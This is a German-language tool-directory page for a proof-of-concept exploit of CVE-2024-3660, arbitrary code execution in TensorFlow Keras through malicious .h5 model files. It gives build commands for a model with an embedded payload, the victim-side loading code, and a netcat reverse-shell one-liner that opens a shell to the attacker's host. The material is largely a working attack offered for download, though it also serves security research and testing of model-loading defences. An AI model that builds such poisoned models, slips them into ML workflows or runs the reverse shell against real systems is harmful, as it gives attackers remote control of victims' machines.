Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3660-PoC — Ein PoC für CVE-2024-3660. Beliebige Codeausführung in Keras. | Kitploit
Tools/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
SchwachstellenanalyseExploitationPenetrationstestsPayload-EntwicklungKI-SicherheitBinary-Exploitation
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

Ein PoC für CVE-2024-3660. Beliebige Codeausführung in Keras.

Repository anzeigen
415vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3660 – Beliebige Codeausführung in TensorFlow Keras durch schädliches Modell

Überblick

CVE-2024-3660 ist eine Schwachstelle zur beliebigen Codeausführung im Keras-Framework von TensorFlow, die Versionen < 2.13 betrifft.
Sie erlaubt es einem Angreifer, Python-Code in ein Modell einzubetten (z. B. über eine Lambda-Schicht), der automatisch ausgeführt wird, wenn das Modell geladen wird.

Wenn eine schädliche .h5-Modelldatei in einer verwundbaren Umgebung geladen wird, werden beliebige Befehle mit denselben Berechtigungen wie der ladende Prozess ausgeführt.


Betroffene Versionen

  • TensorFlow Keras < 2.13.0
  • Keras-Modelle, die geladen werden über:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

oder in älteren TensorFlow-Versionen, in denen safe_mode nicht standardmäßig aktiviert ist.

PoC-Beschreibung

Dieser PoC verwendet einen Docker-basierten Build, um ein schädliches hack.h5-Modell mit einem Reverse-Shell-Payload zu erzeugen. Wenn das Modell in einer verwundbaren TensorFlow-Version geladen wird, baut es eine Verbindung zum Rechner des Angreifers auf.

Verwendung

1. Erstellen und Extrahieren des schädlichen Modells

root@kitploit:~
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. Laden des schädlichen Modells (Opferseite)

  • In einer verwundbaren TensorFlow-Umgebung (< 2.13):
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

Payload

  • Der eingebettete Payload verwendet nc für eine Reverse Shell:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

Referenzen

NVD CMU Oligo Security

Tool herunterladen